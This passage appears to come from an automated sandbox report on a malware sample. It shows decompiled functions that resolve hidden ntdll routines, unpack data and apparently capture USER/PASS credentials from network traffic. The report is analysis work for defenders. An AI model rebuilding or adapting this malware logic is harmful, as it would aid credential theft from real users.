				 *0x41a090 = InternetCloseHandle;
				 *0x41a0a0 = InternetReadFile;
				 *0x41a0b0 = __imp__InternetReadFileExA;
				 *0x41a0c0 = InternetQueryDataAvailable;
				 *0x41a0d0 = HttpQueryInfoA;
				 *0x41a0e0 = __imp__#3;
				 *0x41a0f0 = __imp__#19;
				 *0x41a100 = __imp__WSASend;
				 *0x41a110 = TranslateMessage;
				_push(1);
				 *0x41a120 = GetClipboardData;
				_push( &E0041A020);
				 *0x41a130 = __imp__PFXImportCertStore;
				_t19 = 0x12;
				return E00406290(_t19, _t21, _t22);
			}








            0x004063f7
            0x004063fe
            0x0040640c
            0x00406411
            0x00406400
            0x00406400
            0x00406400
            0x0040641b
            0x00406420
            0x00406425
            0x0040642f
            0x00406439
            0x00406443
            0x0040644d
            0x00406457
            0x00406461
            0x0040646b
            0x00406475
            0x0040647f
            0x00406489
            0x00406493
            0x0040649d
            0x004064a7
            0x004064b1
            0x004064bb
            0x004064bd
            0x004064c7
            0x004064ce
            0x004064d3
            0x004064d9

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID:
            • String ID: @xIw
            • API String ID: 0-258518554
            • Opcode ID: 5d3636b379743b43a998289d071f6ea79033627c22d38d67340deb13f73d5198
            • Instruction ID: 3ee62b3f362d6feea330270f3c35af038253e78f494321a1bac97d5fb863b245
            • Opcode Fuzzy Hash: 5d3636b379743b43a998289d071f6ea79033627c22d38d67340deb13f73d5198
            • Instruction Fuzzy Hash: BD21D8B8A463449FD344DF68EA81A903BF0B34D764700827AE949E7771E375A864DB0E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00412FBB Relevance: .2, Instructions: 190COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 98%
            			E00412FBB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				unsigned int _t67;
				signed int _t68;
				intOrPtr _t71;
				void* _t79;
				signed int _t81;
				intOrPtr _t87;
				intOrPtr _t88;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				unsigned int _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				intOrPtr* _t119;
				unsigned int _t125;
				signed int _t126;
				signed int _t128;

				_t71 = _a4;
				_t98 = 0;
				_t99 = 0;
				_v16 = 0;
				_v20 = 1;
				L1:
				while(1) {
					if(_t99 <= 0) {
						_t103 =  *(_t98 + _t71);
						_t98 = _t98 + 4;
						_t99 = 0x1f;
						_t104 = _t103 >> 0x1f;
					} else {
						_t99 = _t99 - 1;
						_t104 = _t67 >> _t99 & 0x00000001;
					}
					if(_t104 != 0) {
						_v16 = _v16 + 1;
						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
						_t98 = _t98 + 1;
						L6:
						_t71 = _a4;
						continue;
					}
					_v12 = 1;
					do {
						if(_t99 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t100 = 0x1f;
							_t106 = _t67 >> 0x1f;
						} else {
							_t100 = _t99 - 1;
							_t106 = _t67 >> _t100 & 0x00000001;
						}
						_v12 = _t106 + _v12 * 2;
						if(_t100 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t108 = _t67 >> 0x1f;
						} else {
							_t99 = _t100 - 1;
							_t108 = _t67 >> _t99 & 0x00000001;
						}
					} while (_t108 == 0);
					_t111 = _v12;
					if(_t111 == 2) {
						_t81 = _v20;
						L19:
						_v12 = _t81;
						if(_t99 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t101 = 0x1f;
							_v8 = _t67 >> 0x1f;
						} else {
							_t101 = _t99 - 1;
							_v8 = _t67 >> _t101 & 0x00000001;
						}
						if(_t101 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t115 = _t67 >> 0x1f;
						} else {
							_t99 = _t101 - 1;
							_t115 = _t67 >> _t99 & 0x00000001;
						}
						_t116 = _t115 + _v8 * 2;
						_v8 = _t116;
						if(_t116 == 0) {
							_v8 = 1;
							do {
								if(_t99 <= 0) {
									_t125 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t102 = 0x1f;
									_t126 = _t125 >> 0x1f;
								} else {
									_t102 = _t99 - 1;
									_t126 = _t67 >> _t102 & 0x00000001;
								}
								_v8 = _t126 + _v8 * 2;
								if(_t102 <= 0) {
									_t67 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t99 = 0x1f;
									_t128 = _t67 >> 0x1f;
								} else {
									_t99 = _t102 - 1;
									_t128 = _t67 >> _t99 & 0x00000001;
								}
							} while (_t128 == 0);
							_v8 = _v8 + 2;
						}
						asm("sbb ecx, ecx");
						_v8 = _v8 +  ~0xd00;
						_t87 = _v16;
						_t119 = _t87 - _v12 + _a12;
						_v16 = _t119;
						 *((char*)(_t87 + _a12)) =  *_t119;
						_t88 = _t87 + 1;
						_v16 = _v16 + 1;
						do {
							 *((char*)(_t88 + _a12)) =  *_v16;
							_t88 = _t88 + 1;
							_v16 = _v16 + 1;
							_t57 =  &_v8;
							 *_t57 = _v8 - 1;
						} while ( *_t57 != 0);
						_v16 = _t88;
						goto L6;
					}
					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
					_t98 = _t98 + 1;
					if(_t79 != 0xffffffff) {
						_t81 = _t79 + 1;
						_v20 = _t81;
						goto L19;
					}
					_t68 = _a16;
					 *_t68 = _v16;
					return _t68 & 0xffffff00 | _t98 == _a8;
				}
			}






























            0x00412fc2
            0x00412fc6
            0x00412fcb
            0x00412fcd
            0x00412fd0
            0x00000000
            0x00412fd7
            0x00412fd9
            0x00412fec
            0x00412fee
            0x00412ff1
            0x00412ff2
            0x00412fdb
            0x00412fdb
            0x00412fe2
            0x00412fe2
            0x00412ff7
            0x00413002
            0x00413005
            0x00413008
            0x00413009
            0x00413009
            0x00000000
            0x00413009
            0x0041300e
            0x00413015
            0x00413017
            0x00413025
            0x0041302c
            0x0041302f
            0x00413030
            0x00413019
            0x00413019
            0x00413020
            0x00413020
            0x00413039
            0x0041303e
            0x0041304c
            0x00413053
            0x00413056
            0x00413057
            0x00413040
            0x00413040
            0x00413047
            0x00413047
            0x0041305a
            0x0041305e
            0x00413064
            0x00413066
            0x00413085
            0x00413085
            0x0041308a
            0x0041309b
            0x004130a0
            0x004130a8
            0x004130a9
            0x0041308c
            0x0041308c
            0x00413096
            0x00413096
            0x004130ae
            0x004130bc
            0x004130c3
            0x004130c6
            0x004130c7
            0x004130b0
            0x004130b0
            0x004130b7
            0x004130b7
            0x004130cd
            0x004130d0
            0x004130d5
            0x004130d7
            0x004130de
            0x004130e0
            0x004130f3
            0x004130f5
            0x004130f8
            0x004130f9
            0x004130e2
            0x004130e2
            0x004130e9
            0x004130e9
            0x00413102
            0x00413107
            0x00413115
            0x0041311c
            0x0041311f
            0x00413120
            0x00413109
            0x00413109
            0x00413110
            0x00413110
            0x00413123
            0x00413127
            0x00413127
            0x00413133
            0x00413137
            0x0041313a
            0x00413142
            0x00413147
            0x0041314d
            0x00413150
            0x00413151
            0x00413154
            0x0041315c
            0x0041315f
            0x00413160
            0x00413163
            0x00413163
            0x00413163
            0x00413168
            0x00000000
            0x00413168
            0x00413075
            0x00413077
            0x0041307b
            0x00413081
            0x00413082
            0x00000000
            0x00413082
            0x00413170
            0x0041317b
            0x00413182
            0x00413182

            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
            • Instruction ID: 53aff1dd60fc051f0cc40dfca40fbb7002e73854b4021133c6bcf00f89206fc1
            • Opcode Fuzzy Hash: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
            • Instruction Fuzzy Hash: E651E432E00A259BDB14CE98C4506EDF7B1EF89324F1A41AACD16BF385C675AE81D784
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0041168D Relevance: .1, Instructions: 72COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 100%
            			E0041168D() {
				signed int _t18;
				signed int _t55;
				signed int* _t59;
				signed int _t60;
				signed int* _t61;

				_t18 =  *0x41bc70;
				if(_t18 >= 0x270) {
					_t60 = 0;
					do {
						_t55 = _t60 << 2;
						_t60 = _t60 + 1;
						 *(0x41b2a0 + _t55) = (( *(_t55 + 0x41b2a4) ^  *(0x41b2a0 + _t55)) & 0x7fffffff ^  *(0x41b2a0 + _t55)) >> 0x00000001 ^  *(0x41a180 + ((( *(_t55 + 0x41b2a4) ^  *(0x41b2a0 + _t55)) & 0x7fffffff ^  *(0x41b2a0 + _t55)) & 0x00000001) * 4) ^  *(_t55 + 0x41b8d4);
					} while (_t60 < 0xe3);
					if(_t60 < 0x26f) {
						_t59 =  &(0x41b2a0[_t60]);
						do {
							_t10 =  &(_t59[1]); // 0x4
							_t61 = _t10;
							 *_t59 =  *(0x41a180 + ((( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) & 0x00000001) * 4) ^  *(_t61 - 0x390) ^ (( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) >> 0x00000001;
							_t59 = _t61;
						} while (_t59 < 0x41bc5c);
					}
					 *0x41bc5c = (( *0x41b2a0 ^  *0x41bc5c) & 0x7fffffff ^  *0x41bc5c) >> 0x00000001 ^  *(0x41a180 + ((( *0x41b2a0 ^  *0x41bc5c) & 0x7fffffff ^  *0x41bc5c) & 0x00000001) * 4) ^  *0x41b8d0;
					_t18 = 0;
				}
				 *0x41bc70 = _t18 + 1;
				return (0x41b2a0[_t18] ^ 0x41b2a0[_t18] >> 0x0000000b ^ ((0x41b2a0[_t18] ^ 0x41b2a0[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x41b2a0[_t18] ^ 0x41b2a0[_t18] >> 0x0000000b ^ ((0x41b2a0[_t18] ^ 0x41b2a0[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x41b2a0[_t18] ^ 0x41b2a0[_t18] >> 0x0000000b ^ ((0x41b2a0[_t18] ^ 0x41b2a0[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x41b2a0[_t18] ^ 0x41b2a0[_t18] >> 0x0000000b ^ ((0x41b2a0[_t18] ^ 0x41b2a0[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
			}








            0x0041168d
            0x00411697
            0x0041169f
            0x004116a6
            0x004116a8
            0x004116d3
            0x004116da
            0x004116da
            0x004116e8
            0x004116ea
            0x004116f1
            0x004116f3
            0x004116f3
            0x00411712
            0x00411714
            0x00411716
            0x004116f1
            0x00411745
            0x0041174a
            0x0041174a
            0x00411754
            0x0041177f

            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2146361baf1e7d1493d86167f4ec3e89f0e9dcd049390e2fd3f03e10c4c5607a
            • Instruction ID: 859c0f1a8cb9c525fdf76151fa0e92939cb901a38e5ca7e47d32616e49cc3b6b
            • Opcode Fuzzy Hash: 2146361baf1e7d1493d86167f4ec3e89f0e9dcd049390e2fd3f03e10c4c5607a
            • Instruction Fuzzy Hash: 122150323204158F9748CF39DC5969A33E2F78D358759857DD519CB2A0DB39E452CB88
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040CC5C Relevance: .0, Instructions: 25COMMON
            Download Yara Rule
            C-Code - Quality: 44%
            			E0040CC5C(char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _t13;

				E00403E2A();
				if(E00403E39() == 0 || _a8 == 0 || _a12 <= 0) {
					L5:
					return InternetReadFile();
				}
				_t19 = _a16;
				if(_a16 == 0) {
					goto L5;
				}
				_t13 = E0040C545(_t19,  &_a4, _a8, _a12, _a16);
				if(_t13 == 0xffffffff) {
					goto L5;
				}
				return _t13;
			}




            0x0040cc5f
            0x0040cc6b
            0x0040cc96
            0x0040cc96
            0x0040cc96
            0x0040cc79
            0x0040cc7c
            0x00000000
            0x00000000
            0x0040cc8b
            0x0040cc93
            0x00000000
            0x00000000
            0x0040cc9d

            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalObjectSectionSingleWait$EnterLeave
            • String ID:
            • API String ID: 1945063896-0
            • Opcode ID: 389b938b5b5fbcdec2cd92d8c8cdc1f78afd273547de950c4eeaf2ec6478a090
            • Instruction ID: 58740883f1ef1615bc24919872f8fd8ef850c194703329b0f93a6bd2ccec73bd
            • Opcode Fuzzy Hash: 389b938b5b5fbcdec2cd92d8c8cdc1f78afd273547de950c4eeaf2ec6478a090
            • Instruction Fuzzy Hash: 94E0923140424EDADF11AF70D9484AF3769EB08365B044737F82DB92D1E739C560DB59
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00414C0D Relevance: .0, Instructions: 24COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
            • Instruction ID: e65d746d6d55072558b95040d016f16811cc0288c30be6af9bb6f206a405ec3f
            • Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
            • Instruction Fuzzy Hash: 6EE0DFBA702011CBC710CA11E480D83B7A6FBD8730B1286A5C8158B309DA38EDC389D1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004035C8 Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 76libraryloaderCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 299 4035c8-4035db call 414c0d 302 4035e1-4035ed 299->302 303 4035dd-4035df 299->303 305 403603-403626 call 403500 * 2 call 414f64 302->305 306 4035ef-4035f9 GetModuleHandleW 302->306 304 4035fe-403600 303->304 307 403628-403636 GetModuleHandleW 305->307 308 4035fb 305->308 306->307 306->308 307->308 312 403638-4036ab GetProcAddress * 6 307->312 310 4035fd 308->310 310->304 314 4036b9-4036bf 312->314 315 4036ad-4036b3 312->315 314->308 316 4036c5-4036cb 314->316 315->308 315->314 316->308 318 4036d1-4036d3 316->318 318->308 320 4036d9-4036db 318->320 320->310
            C-Code - Quality: 100%
            			E004035C8(void* __edx, signed int _a4) {
				void* __edi;
				void* _t4;
				struct HINSTANCE__* _t6;
				void* _t7;
				struct HINSTANCE__* _t8;
				_Unknown_base(*)()* _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t19 = __edx;
				_t20 = E00414C0D();
				 *0x41a2a8 = _t20;
				if(_t20 != 0) {
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) != 0) {
						_t4 = E00403500(_t18, _t19, _t20, "GetProcAddress");
						_t6 = E00414F64(_t18,  *0x41a2a4, E00403500(_t18, _t19, _t20, "LoadLibraryA"), _t4);
						__eflags = _t6;
						if(_t6 == 0) {
							L4:
							_t7 = 0;
							__eflags = 0;
							L5:
							return _t7;
						}
						L8:
						_t8 = GetModuleHandleW(L"ntdll.dll");
						 *0x41a2ac = _t8;
						__eflags = _t8;
						if(_t8 == 0) {
							goto L4;
						}
						 *0x41a2b0 = GetProcAddress(_t8, "NtCreateThread");
						 *0x41a2b4 = GetProcAddress( *0x41a2ac, "NtCreateUserProcess");
						 *0x41a2b8 = GetProcAddress( *0x41a2ac, "NtQueryInformationProcess");
						 *0x41a2bc = GetProcAddress( *0x41a2ac, "RtlUserThreadStart");
						 *0x41a2c0 = GetProcAddress( *0x41a2ac, "LdrLoadDll");
						_t14 = GetProcAddress( *0x41a2ac, "LdrGetDllHandle");
						 *0x41a2c4 = _t14;
						__eflags =  *0x41a2b0; // 0x774c99e0
						if(__eflags != 0) {
							L11:
							__eflags =  *0x41a2b8; // 0x774c9670
							if(__eflags == 0) {
								goto L4;
							}
							__eflags =  *0x41a2c0; // 0x77497840
							if(__eflags == 0) {
								goto L4;
							}
							__eflags = _t14;
							if(_t14 == 0) {
								goto L4;
							}
							_t7 = 1;
							goto L5;
						}
						__eflags =  *0x41a2b4; // 0x774ca120
						if(__eflags == 0) {
							goto L4;
						}
						goto L11;
					}
					_t15 = GetModuleHandleW(0);
					 *0x41a2a4 = _t15;
					__eflags = _t15;
					if(_t15 != 0) {
						goto L8;
					}
					goto L4;
				}
				return 0;
			}













            0x004035c8
            0x004035cf
            0x004035d3
            0x004035db
            0x004035e1
            0x004035ed
            0x00403608
            0x0040361f
            0x00403624
            0x00403626
            0x004035fb
            0x004035fb
            0x004035fb
            0x004035fd
            0x00000000
            0x004035fd
            0x00403628
            0x0040362d
            0x0040362f
            0x00403634
            0x00403636
            0x00000000
            0x00000000
            0x00403651
            0x00403663
            0x00403675
            0x00403687
            0x00403699
            0x0040369e
            0x004036a0
            0x004036a5
            0x004036ab
            0x004036b9
            0x004036b9
            0x004036bf
            0x00000000
            0x00000000
            0x004036c5
            0x004036cb
            0x00000000
            0x00000000
            0x004036d1
            0x004036d3
            0x00000000
            0x00000000
            0x004036d9
            0x00000000
            0x004036d9
            0x004036ad
            0x004036b3
            0x00000000
            0x00000000
            0x00000000
            0x004036b3
            0x004035f0
            0x004035f2
            0x004035f7
            0x004035f9
            0x00000000
            0x00000000
            0x00000000
            0x004035f9
            0x00000000

            APIs
            • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000000,00403A84), ref: 004035F0
            • GetModuleHandleW.KERNEL32(ntdll.dll,00000000,LoadLibraryA,00000000,GetProcAddress,00000000,?,00000000,00403A84), ref: 0040362D
            • GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00403644
            • GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 00403656
            • GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 00403668
            • GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0040367A
            • GetProcAddress.KERNEL32(LdrLoadDll), ref: 0040368C
            • GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 0040369E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressProc$HandleModule
            • String ID: @xIw$GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart$ntdll.dll
            • API String ID: 667068680-3133929969
            • Opcode ID: 543c6403585146024561e6f1501720aaabf06d58705456c233147a7fd5cc044b
            • Instruction ID: 5b133602ea308588cbd520664be43c3e4d92dbbf672ba60951e0d221763357b2
            • Opcode Fuzzy Hash: 543c6403585146024561e6f1501720aaabf06d58705456c233147a7fd5cc044b
            • Instruction Fuzzy Hash: 25217175906211BFCB116FA1DC869AB3E9CA60431231084BBE904733F1D77F45659E5E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040B6A0 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 194COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 559 40b6a0-40b6b7 560 40b919 559->560 561 40b6bd-40b6bf 559->561 562 40b91b-40b921 560->562 561->560 563 40b6c5-40b6cb 561->563 563->560 564 40b6d1-40b6d4 563->564 565 40b6da-40b6e6 564->565 566 40b7bf-40b7c2 564->566 568 40b6f3-40b6f7 565->568 569 40b6e8-40b6ed 565->569 566->560 567 40b7c8-40b7e1 EnterCriticalSection call 40b594 566->567 574 40b912 567->574 575 40b7e7-40b7ea 567->575 568->566 570 40b6fd-40b707 568->570 569->566 569->568 570->560 573 40b70d-40b713 570->573 576 40b715-40b718 573->576 577 40b728-40b72a 573->577 574->560 578 40b7f0-40b7f3 575->578 579 40b90a 575->579 576->577 580 40b71a-40b71d 576->580 577->560 581 40b730-40b732 577->581 578->579 582 40b7f9-40b7fc 578->582 584 40b90b-40b90d call 40b635 579->584 580->560 583 40b723-40b726 580->583 581->560 585 40b738-40b747 call 41065d 581->585 586 40b814-40b817 582->586 587 40b7fe-40b802 582->587 583->573 583->577 584->574 585->560 597 40b74d-40b769 EnterCriticalSection call 40b594 585->597 586->574 592 40b81d-40b82b 586->592 590 40b804-40b806 587->590 591 40b808-40b80c 587->591 590->586 590->591 591->586 594 40b80e-40b812 591->594 595 40b83d-40b845 592->595 596 40b82d-40b833 592->596 594->586 594->595 600 40b863-40b889 call 40f369 getpeername 595->600 596->595 598 40b835-40b83b 596->598 607 40b781-40b789 597->607 608 40b76b-40b777 call 40b5cd 597->608 598->595 602 40b847-40b84d 598->602 609 40b906-40b908 600->609 610 40b88b-40b896 call 413726 600->610 605 40b85b-40b862 602->605 606 40b84f-40b855 602->606 605->600 606->574 606->605 611 40b799-40b7a1 call 410418 607->611 612 40b78b-40b797 call 40b635 607->612 608->607 618 40b779-40b77f call 410418 608->618 609->584 610->609 623 40b898-40b89d 610->623 624 40b7a4-40b7a7 611->624 612->624 628 40b7a9-40b7ba LeaveCriticalSection 618->628 626 40b8c3-40b903 call 4136dd call 40f369 call 40d965 623->626 627 40b89f-40b8a4 623->627 624->628 626->609 627->609 629 40b8a6-40b8c1 call 40f369 call 411145 627->629 628->562 629->609 629->626
            C-Code - Quality: 87%
            			E0040B6A0(void* __eax, signed int* __ecx, intOrPtr _a4) {
				char _v536;
				char _v652;
				char _v664;
				char _v696;
				char _v700;
				char _v701;
				char _v708;
				signed int _v713;
				void* __edi;
				void* __esi;
				char* _t40;
				char* _t49;
				intOrPtr _t50;
				void* _t60;
				intOrPtr _t63;
				signed int _t64;
				signed int _t66;
				void* _t67;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				signed int* _t83;
				void* _t84;
				intOrPtr _t85;
				signed int* _t87;
				signed int _t90;
				void* _t91;
				void* _t93;
				void* _t99;
				intOrPtr* _t100;

				_t93 = __eax;
				_t87 = __ecx;
				if(_a4 == 0xffffffff || __ecx == 0 || __eax > 0x200) {
					L51:
					_t40 = 0;
					__eflags = 0;
				} else {
					if(__eax <= 6) {
						L24:
						__eflags = _t93 - 1;
						if(_t93 <= 1) {
							goto L51;
						} else {
							EnterCriticalSection(0x41aa1c);
							_t78 = E0040B594(_a4);
							__eflags = _t78;
							if(_t78 != 0) {
								__eflags =  *((intOrPtr*)(_t78 + 4));
								if( *((intOrPtr*)(_t78 + 4)) == 0) {
									L48:
									_push(0);
									goto L49;
								} else {
									__eflags =  *((intOrPtr*)(_t78 + 8));
									if( *((intOrPtr*)(_t78 + 8)) == 0) {
										goto L48;
									} else {
										__eflags = _t93 - 3;
										if(_t93 < 3) {
											L33:
											__eflags = _t93 - 4;
											if(_t93 >= 4) {
												_t90 =  *_t87 ^ 0x02000800;
												__eflags = _t90 - 0x47505154;
												if(_t90 == 0x47505154) {
													goto L37;
												} else {
													__eflags = _t90 - 0x56414d46;
													if(_t90 == 0x56414d46) {
														goto L37;
													} else {
														__eflags = _t90 - 0x54534950;
														if(_t90 != 0x54534950) {
															__eflags = _t90 - 0x56415c53;
															if(_t90 == 0x56415c53) {
																L40:
																_push(2);
																_v701 = 0x65;
																_pop(1);
																goto L41;
															} else {
																__eflags = _t90 - 0x5653414c;
																if(_t90 == 0x5653414c) {
																	goto L40;
																}
															}
														} else {
															goto L37;
														}
													}
												}
											}
										} else {
											_t64 =  *_t87;
											__eflags = _t64 - 0x43;
											if(_t64 == 0x43) {
												L31:
												__eflags = _t87[0] - 0x57;
												if(_t87[0] != 0x57) {
													goto L33;
												} else {
													__eflags = _t87[0] - 0x44;
													if(_t87[0] == 0x44) {
														L37:
														_v701 = 0x64;
														L41:
														E0040F369(1,  &_v696);
														_t49 =  &_v652;
														_v700 = 0x80;
														__imp__#5(_a4, _t49,  &_v700);
														__eflags = _t49;
														if(_t49 == 0) {
															_t82 =  &_v664;
															_t50 = E00413726( &_v664);
															__eflags = _t50;
															if(_t50 == 0) {
																__eflags = _v713 - 0x65;
																if(_v713 == 0x65) {
																	L46:
																	E004136DD( &_v664, _t82,  &_v536);
																	__eflags = 0;
																	E0040F369(0,  &_v696);
																	_push( &_v536);
																	_push( *((intOrPtr*)(_t78 + 8)));
																	_push( *((intOrPtr*)(_t78 + 4)));
																	E0040D965(_t82, _t84, __eflags, _v713 & 0x000000ff, 0, 0,  &_v696,  &_v708);
																} else {
																	__eflags = _v713 - 0x64;
																	if(_v713 == 0x64) {
																		_t60 = 3;
																		E0040F369(_t60,  &_v696);
																		_t82 =  *((intOrPtr*)(_t78 + 4));
																		_t91 = 9;
																		_t63 = E00411145( &_v696,  *((intOrPtr*)(_t78 + 4)), _t91);
																		__eflags = _t63;
																		if(_t63 != 0) {
																			goto L46;
																		}
																	}
																}
															}
														}
														_push(0);
														L49:
														E0040B635(_t78);
													} else {
														goto L33;
													}
												}
											} else {
												__eflags = _t64 - 0x50;
												if(_t64 != 0x50) {
													goto L33;
												} else {
													goto L31;
												}
											}
										}
									}
								}
							}
							_t79 = 0;
							goto L23;
						}
					} else {
						_t66 =  *__ecx ^ 0x02000800;
						if(_t66 == 0x50455b55 || _t66 == 0x51534950) {
							if(_t87[1] != 0x20) {
								goto L24;
							} else {
								_t99 = _t93 + 0xfffffffb;
								_t67 = 0;
								_t83 =  &(_t87[1]);
								if(_t99 <= 0) {
									goto L51;
								} else {
									while(1) {
										_t85 =  *((intOrPtr*)(_t67 + _t83));
										if(_t85 == 0xd || _t85 == 0xa) {
											break;
										}
										if(_t85 < 0x20) {
											goto L51;
										} else {
											_t67 = _t67 + 1;
											if(_t67 < _t99) {
												continue;
											} else {
												break;
											}
										}
										goto L52;
									}
									if(_t67 == 0 || _t67 == _t99) {
										goto L51;
									} else {
										_t80 = E0041065D(_t67, 0xfde9, _t83);
										if(_t80 == 0) {
											goto L51;
										} else {
											_v701 = 0;
											EnterCriticalSection(0x41aa1c);
											_t100 = E0040B594(_a4);
											if(_t100 != 0) {
												L18:
												__eflags =  *_t87 - 0x55;
												_v701 = 1;
												if( *_t87 != 0x55) {
													E00410418( *((intOrPtr*)(_t100 + 8)));
													 *((intOrPtr*)(_t100 + 8)) = _t80;
												} else {
													E0040B635(_t100, 1);
													 *((intOrPtr*)(_t100 + 4)) = _t80;
												}
												 *_t100 = _a4;
											} else {
												_t100 = E0040B5CD(_a4);
												if(_t100 != 0) {
													goto L18;
												} else {
													E00410418(_t80);
												}
											}
											_t79 = _v701;
											L23:
											LeaveCriticalSection(0x41aa1c);
											_t40 = _t79;
										}
									}
								}
							}
						} else {
							goto L24;
						}
					}
				}
				L52:
				return _t40;
			}

































            0x0040b6b3
            0x0040b6b5
            0x0040b6b7
            0x0040b919
            0x0040b919
            0x0040b919
            0x0040b6d1
            0x0040b6d4
            0x0040b7bf
            0x0040b7bf
            0x0040b7c2
            0x00000000
            0x0040b7c8
            0x0040b7cd
            0x0040b7db
            0x0040b7df
            0x0040b7e1
            0x0040b7e7
            0x0040b7ea
            0x0040b90a
            0x0040b90a
            0x00000000
            0x0040b7f0
            0x0040b7f0
            0x0040b7f3
            0x00000000
            0x0040b7f9
            0x0040b7f9
            0x0040b7fc
            0x0040b814
            0x0040b814
            0x0040b817
            0x0040b81f
            0x0040b825
            0x0040b82b
            0x00000000
            0x0040b82d
            0x0040b82d
            0x0040b833
            0x00000000
            0x0040b835
            0x0040b835
            0x0040b83b
            0x0040b847
            0x0040b84d
            0x0040b85b
            0x0040b85b
            0x0040b85d
            0x0040b862
            0x00000000
            0x0040b84f
            0x0040b84f
            0x0040b855
            0x00000000
            0x00000000
            0x0040b855
